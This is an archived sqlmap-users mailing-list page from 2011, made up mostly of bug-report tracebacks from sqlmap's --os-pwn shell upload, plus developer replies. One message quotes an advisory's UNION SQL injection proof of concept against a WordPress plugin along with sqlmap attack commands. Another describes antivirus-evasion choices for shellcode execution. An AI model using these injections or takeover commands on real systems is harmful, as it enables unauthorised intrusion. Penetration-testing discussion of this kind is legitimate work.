>> File "./sqlmap.py", line 83, in main >> start() >> File "/pentest/database/sqlmap/lib/controller/controller.py", line 485, >> in start >> action() >> File "/pentest/database/sqlmap/lib/controller/action.py", line 136, in >> action >> conf.dbmsHandler.osPwn() >> File "/pentest/database/sqlmap/plugins/generic/takeover.py", line 243, >> in osPwn >> self.uploadMsfPayloadStager(web=web) >> File "/pentest/database/sqlmap/lib/takeover/metasploit.py", line 628, in >> uploadMsfPayloadStager >> self.webFileUpload(self.exeFilePathLocal, self.exeFilePathRemote, >> self.webDirectory) >> File "/pentest/database/sqlmap/lib/takeover/web.py", line 77, in >> webFileUpload >> retVal = self.__webFileStreamUpload(inputFP, destFileName, directory) >> File "/pentest/database/sqlmap/lib/takeover/web.py", line 96, in >> __webFileStreamUpload >> page = Request.getPage(url=self.webStagerUrl, >> multipart=multipartParams, raise404=False) >> File "/pentest/database/sqlmap/lib/request/connect.py", line 130, in >> getPage >> conn = multipartOpener.open(url, multipart) >> File "/usr/lib/python2.7/urllib2.py", line 391, in open >> response = self._open(req, data) >> File "/usr/lib/python2.7/urllib2.py", line 409, in _open >> '_open', req) >> File "/usr/lib/python2.7/urllib2.py", line 369, in _call_chain >> result = func(*args) >> File "/usr/lib/python2.7/urllib2.py", line 1173, in http_open >> return self.do_open(httplib.HTTPConnection, req) >> File "/usr/lib/python2.7/urllib2.py", line 1142, in do_open >> h.request(req.get_method(), req.get_selector(), req.data, headers) >> File "/usr/lib/python2.7/httplib.py", line 946, in request >> self._send_request(method, url, body, headers) >> File "/usr/lib/python2.7/httplib.py", line 987, in _send_request >> self.endheaders(body) >> File "/usr/lib/python2.7/httplib.py", line 940, in endheaders >> self._send_output(message_body) >> File "/usr/lib/python2.7/httplib.py", line 801, in _send_output >> msg += message_body >> UnicodeDecodeError: 'ascii' codec can't decode byte 0x80 in position 387: >> ordinal not in range(128) >> [*] shutting down at: 10:24:59 >> [root@localhost sqlmap]# >> -- >> >> Ahmed Shawky El-Antry >> Pen-tester, Programmer and System administrator >> lnxg33k owner "http://lnxg33k.wordpress.com" >> Isecur1ty team member"http://www.isecur1ty.org" >> Twitter @lnxg33k > > > > -- > > Ahmed Shawky El-Antry > Pen-tester, Programmer and System administrator > lnxg33k owner "http://lnxg33k.wordpress.com" > Isecur1ty team member"http://www.isecur1ty.org" > Twitter @lnxg33k > > ------------------------------------------------------------------------------ > Fulfilling the Lean Software Promise > Lean software platforms are now widely adopted and the benefits have been > demonstrated beyond question. Learn why your peers are replacing JEE > containers with lightweight application servers - and what you can gain > from the move. http://p.sf.net/sfu/vmware-sfemails > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: Ahmed S. <ah...@is...> - 2011-04-25 08:32:04
|
it based uploading shell with the latest reversion (r3770) but here is
another issue
[10:30:07] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3770), retry
your run with the latest development version from the Subversion repository.
If the exception persists, please send by e-mail to
sql...@li... the following text and any information
required to reproduce the bug. The developers will try to reproduce the bug,
fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r3770)
Python version: 2.7
Operating system: posix
Command line: ./sqlmap.py -u
******************************************************* -p id --text-only
--cookie PHPSESSID=omqf68n95iss0op71odobvnhh4; security=low --os-pwn
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
File "./sqlmap.py", line 83, in main
start()
File "/pentest/database/sqlmap/lib/controller/controller.py", line 485, in
start
action()
File "/pentest/database/sqlmap/lib/controller/action.py", line 136, in
action
conf.dbmsHandler.osPwn()
File "/pentest/database/sqlmap/plugins/generic/takeover.py", line 245, in
osPwn
self.uploadShellcodeexec(web=web)
File "/pentest/database/sqlmap/lib/takeover/metasploit.py", line 560, in
uploadShellcodeexec
self.webFileUpload(self.shellcodeexecLocal, self.shellcodeexecRemote,
self.webDirectory)
File "/pentest/database/sqlmap/lib/takeover/web.py", line 77, in
webFileUpload
retVal = self.__webFileStreamUpload(inputFP, destFileName, directory)
File "/pentest/database/sqlmap/lib/takeover/web.py", line 96, in
__webFileStreamUpload
page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams,
raise404=False)
File "/pentest/database/sqlmap/lib/request/connect.py", line 130, in
getPage
conn = multipartOpener.open(url, multipart)
File "/usr/lib/python2.7/urllib2.py", line 391, in open
response = self._open(req, data)
File "/usr/lib/python2.7/urllib2.py", line 409, in _open
'_open', req)
File "/usr/lib/python2.7/urllib2.py", line 369, in _call_chain
result = func(*args)
File "/usr/lib/python2.7/urllib2.py", line 1173, in http_open
return self.do_open(httplib.HTTPConnection, req)
File "/usr/lib/python2.7/urllib2.py", line 1142, in do_open
h.request(req.get_method(), req.get_selector(), req.data, headers)
File "/usr/lib/python2.7/httplib.py", line 946, in request
self._send_request(method, url, body, headers)
File "/usr/lib/python2.7/httplib.py", line 987, in _send_request
self.endheaders(body)
File "/usr/lib/python2.7/httplib.py", line 940, in endheaders
self._send_output(message_body)
File "/usr/lib/python2.7/httplib.py", line 801, in _send_output
msg += message_body
UnicodeDecodeError: 'ascii' codec can't decode byte 0x84 in position 396:
ordinal not in range(128)
[*] shutting down at: 10:30:07
On Mon, Apr 25, 2011 at 10:27 AM, Ahmed Shawky <ah...@is...> wrote:
> there is an issue when sqlmap comes to shell upload via os-shell or os-pwn
>
> [10:24:59] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3767), retry
> your run with the latest development version from the Subversion repository.
> If the exception persists, please send by e-mail to
> sql...@li... the following text and any information
> required to reproduce the bug. The developers will try to reproduce the bug,
> fix it accordingly and get back to you.
> sqlmap version: 1.0-dev (r3767)
> Python version: 2.7
> Operating system: posix
> Command line: ./sqlmap.py -u
> ******************************************************* -p id --text-only
> --cookie PHPSESSID=omqf68n95iss0op71odobvnhh4; security=low --os-pwn
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
> File "./sqlmap.py", line 83, in main
> start()
> File "/pentest/database/sqlmap/lib/controller/controller.py", line 485,
> in start
> action()
> File "/pentest/database/sqlmap/lib/controller/action.py", line 136, in
> action
> conf.dbmsHandler.osPwn()
> File "/pentest/database/sqlmap/plugins/generic/takeover.py", line 243, in
> osPwn
> self.uploadMsfPayloadStager(web=web)
> File "/pentest/database/sqlmap/lib/takeover/metasploit.py", line 628, in
> uploadMsfPayloadStager
> self.webFileUpload(self.exeFilePathLocal, self.exeFilePathRemote,
> self.webDirectory)
> File "/pentest/database/sqlmap/lib/takeover/web.py", line 77, in
> webFileUpload
> retVal = self.__webFileStreamUpload(inputFP, destFileName, directory)
> File "/pentest/database/sqlmap/lib/takeover/web.py", line 96, in
> __webFileStreamUpload
> page = Request.getPage(url=self.webStagerUrl,
> multipart=multipartParams, raise404=False)
> File "/pentest/database/sqlmap/lib/request/connect.py", line 130, in
> getPage
> conn = multipartOpener.open(url, multipart)
> File "/usr/lib/python2.7/urllib2.py", line 391, in open
> response = self._open(req, data)
> File "/usr/lib/python2.7/urllib2.py", line 409, in _open
> '_open', req)
> File "/usr/lib/python2.7/urllib2.py", line 369, in _call_chain
> result = func(*args)
> File "/usr/lib/python2.7/urllib2.py", line 1173, in http_open
> return self.do_open(httplib.HTTPConnection, req)
> File "/usr/lib/python2.7/urllib2.py", line 1142, in do_open
> h.request(req.get_method(), req.get_selector(), req.data, headers)
> File "/usr/lib/python2.7/httplib.py", line 946, in request
> self._send_request(method, url, body, headers)
> File "/usr/lib/python2.7/httplib.py", line 987, in _send_request
> self.endheaders(body)
> File "/usr/lib/python2.7/httplib.py", line 940, in endheaders
> self._send_output(message_body)
> File "/usr/lib/python2.7/httplib.py", line 801, in _send_output
> msg += message_body
> UnicodeDecodeError: 'ascii' codec can't decode byte 0x80 in position 387:
> ordinal not in range(128)
>
> [*] shutting down at: 10:24:59
>
> [root@localhost sqlmap]#
>
> --
>
> - Ahmed Shawky El-Antry
> - Pen-tester, Programmer and System administrator
> - lnxg33k owner "http://lnxg33k.wordpress.com"
> - Isecur1ty team member"http://www.isecur1ty.org"
> - Twitter @lnxg33k
>
>
>
--
- Ahmed Shawky El-Antry
- Pen-tester, Programmer and System administrator
- lnxg33k owner "http://lnxg33k.wordpress.com"
- Isecur1ty team member"http://www.isecur1ty.org"
- Twitter @lnxg33k
|
|
From: Ahmed S. <ah...@is...> - 2011-04-25 08:27:15
|
there is an issue when sqlmap comes to shell upload via os-shell or os-pwn
[10:24:59] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3767), retry
your run with the latest development version from the Subversion repository.
If the exception persists, please send by e-mail to
sql...@li... the following text and any information
required to reproduce the bug. The developers will try to reproduce the bug,
fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r3767)
Python version: 2.7
Operating system: posix
Command line: ./sqlmap.py -u
******************************************************* -p id --text-only
--cookie PHPSESSID=omqf68n95iss0op71odobvnhh4; security=low --os-pwn
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
File "./sqlmap.py", line 83, in main
start()
File "/pentest/database/sqlmap/lib/controller/controller.py", line 485, in
start
action()
File "/pentest/database/sqlmap/lib/controller/action.py", line 136, in
action
conf.dbmsHandler.osPwn()
File "/pentest/database/sqlmap/plugins/generic/takeover.py", line 243, in
osPwn
self.uploadMsfPayloadStager(web=web)
File "/pentest/database/sqlmap/lib/takeover/metasploit.py", line 628, in
uploadMsfPayloadStager
self.webFileUpload(self.exeFilePathLocal, self.exeFilePathRemote,
self.webDirectory)
File "/pentest/database/sqlmap/lib/takeover/web.py", line 77, in
webFileUpload
retVal = self.__webFileStreamUpload(inputFP, destFileName, directory)
File "/pentest/database/sqlmap/lib/takeover/web.py", line 96, in
__webFileStreamUpload
page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams,
raise404=False)
File "/pentest/database/sqlmap/lib/request/connect.py", line 130, in
getPage
conn = multipartOpener.open(url, multipart)
File "/usr/lib/python2.7/urllib2.py", line 391, in open
response = self._open(req, data)
File "/usr/lib/python2.7/urllib2.py", line 409, in _open
'_open', req)
File "/usr/lib/python2.7/urllib2.py", line 369, in _call_chain
result = func(*args)
File "/usr/lib/python2.7/urllib2.py", line 1173, in http_open
return self.do_open(httplib.HTTPConnection, req)
File "/usr/lib/python2.7/urllib2.py", line 1142, in do_open
h.request(req.get_method(), req.get_selector(), req.data, headers)
File "/usr/lib/python2.7/httplib.py", line 946, in request
self._send_request(method, url, body, headers)
File "/usr/lib/python2.7/httplib.py", line 987, in _send_request
self.endheaders(body)
File "/usr/lib/python2.7/httplib.py", line 940, in endheaders
self._send_output(message_body)
File "/usr/lib/python2.7/httplib.py", line 801, in _send_output
msg += message_body
UnicodeDecodeError: 'ascii' codec can't decode byte 0x80 in position 387:
ordinal not in range(128)
[*] shutting down at: 10:24:59
[root@localhost sqlmap]#
--
- Ahmed Shawky El-Antry
- Pen-tester, Programmer and System administrator
- lnxg33k owner "http://lnxg33k.wordpress.com"
- Isecur1ty team member"http://www.isecur1ty.org"
- Twitter @lnxg33k
|
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-25 00:40:23
|
Hi, As of r3768 UPX is not part of sqlmap anymore and the --os-pwn switch has been slightly revamped. As per commit message: """ [...] Now the Metasploit shellcode can not be run as a Metasploit generated payload stager anymore. Instead it can be run on the target system either via sys_bineval() (as it was before, anti-forensics mode, all the same) or via shellcodeexec executable. Advantages are that: * It is stealthier as the shellcode itself does not touch the filesystem, it's an argument passed to shellcodeexec at runtime. * shellcodeexec is not (yet) recognized as malicious by any (Avast excluded) AV product. * shellcodeexec binary size is significantly smaller than a Metasploit payload stager (even when packed with UPX). * UPX now is not needed anymore, so sqlmap package is also way smaller and less likely to be detected itself as malicious by your AV software. [...] """ Cheers, Bernardo On 21 April 2011 12:00, Miroslav Stampar <mir...@gm...> wrote: > hi all. > > just to inform you that --os-pwn was down for last couple of days due > to a bug (if run on non-Windows platforms) with packing of payloads as > a result of our anti-virus avoiding maneuverers (UPX is falsely flaged > as virus by 10% of antivirus software, and it's quite annoying that > for example Avast triggers on official 0.9 release because of UPX). > > now everything should be back on tracks. > > kr > > -- > Miroslav Stampar > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-25 00:20:56
|
Hi Tom, In order to better understand what is going on and track down a possible bug, could you please provide us with the full output of your sqlmap command with --flush-session -v3 --parse-errors --columns -T <your_table_name> -D <your_db_name> -t traffic.log and send use the traffic log file too? You can mask sensible information and send it privately to me and Miroslav to debug if you prefer. Thank you, Bernardo On 24 April 2011 18:53, Tom Thumb <k1...@li...> wrote: > When trying to dump a table containing over 10000 entries, only 32 results > are returned (rows with id 8, 9, 90-99, 990-999, 9990-9999). All the other > data is not dumped, and I can't understand why. > Can anyone explain this behaviour? > Obviously I'm pleased that my database does not appear to be completely > exploitable, but I'm worried that I'm missing something simple, and that > there is something a hacker could do to retreive the rest of the data... > Test subject is an MSSQL 2005 Database runing on Windows 2003. -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-24 23:52:35
|
Hi Emiliano, On 24 April 2011 22:21, Emiliano Bazaes <emi...@7e...> wrote: > ... > Here's this poc provided in the advisory: > > http://[host]/wp-content/plugins/ajax-category-dropdown/includes/dhat-ajax-cat-dropdown-request.php?admin&category_level=2&category_id=1%20union%20select%201,user%28%29,3,4,5,6,7,8,9,version%28%29%20--%201 > > As you can see there's a 10 columns UNION, of which columns 2 and 10 are > rendered on the page; so when you try the above proof-of-concept on a > vulnerable target it should render a single item dropdown box in the format: > > db_user (db_version) > > However, I couldn't seem to be able to exploit it via sqlmap > ... The detection engine fails to detect this specific UNION query SQL injection because the HTTP response bodies for valid and invalid number of injected columns differ very little. In order to avoid this problem, you can run sqlmap with --text-only switch, where only the proper text of the response bodies are considered for matching/comparison (by excluding HTML tags, scripts, etc. - see user's manual for details). Regards, Bernardo and Miroslav -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: Emiliano B. <emi...@7e...> - 2011-04-24 21:21:43
|
Hi, I just read this Multiple SQL Injection in Ajax Category Dropdown wordpress plugin<http://www.htbridge.ch/advisory/multiple_sql_injection_in_ajax_category_dropdown_wordpress_plugin.html>advisory published by High-Tech Bridge. Among others there's a generic UNION inject on the *category_id* GET parameter, and I decided to try it with sqlmap. Here's this poc provided in the advisory: http:// [host]/wp-content/plugins/ajax-category-dropdown/includes/dhat-ajax-cat-dropdown-request.php?admin&category_level=2&category_id=1%20union%20select%201,user%28%29,3,4,5,6,7,8,9,version%28%29%20--%201 As you can see there's a 10 columns UNION, of which columns 2 and 10 are rendered on the page; so when you try the above proof-of-concept on a vulnerable target it should render a single item dropdown box in the format: db_user (db_version) However, I couldn't seem to be able to exploit it via sqlmap So, being are it was a Linux box and considering WordPress runs on MySQL, I used the following as a base for the test: ./sqlmap.py --os linux --dbms mysql --technique U --union-cols 9-11 -p category_id --referer "http://[host]/" -u "http:// [host]/wp-content/plugins/ajax-category-dropdown/includes/dhat-ajax-cat-dropdown-request.php?admin&category_level=2&category_id=1" And then I tried everything from _--level 1_ to _5_, from _--risk 1_ to _3_, with and without _--string "Uncategorized"_ (wich applies for GET _category_id=1_), and even _--prefix " union select " --suffix " -- 1"_; all with no luck. In the end I removed all of the previous flags until I was finally able to exploit an _OR boolean-based blind - WHERE or HAVING clause_ and a _MySQL > 5.0.11 OR time-based blind_ inject, only when using the _--risk 3 --level 2_; there was also a _MySQL < 5.0.12 AND time-based blind (heavy query)_ on _--risk 2 --level 2_, but it was too much for the server. But still, no way to exploit the actual UNION flaw via sqlmap. Any clue? -- Emiliano |
|
From: Tom T. <k1...@li...> - 2011-04-24 18:05:42
|
When trying to dump a table containing over 10000 entries, only 32 results are returned (rows with id 8, 9, 90-99, 990-999, 9990-9999). All the other data is not dumped, and I can't understand why. Can anyone explain this behaviour? Obviously I'm pleased that my database does not appear to be completely exploitable, but I'm worried that I'm missing something simple, and that there is something a hacker could do to retreive the rest of the data... Test subject is an MSSQL 2005 Database runing on Windows 2003. |
|
From: Goce T. <amo...@gm...> - 2011-04-24 03:11:53
|
I've been doing some experiments with sqlmap and I found out that when i turn off the icmp so there is no ping reply from the target server, sqlmap is not working and it says connection timed out. It would be great if there is an option to treat the host online and don't ping it. Best regards, Amon. |
48 messages has been excluded from this view by a project administrator.
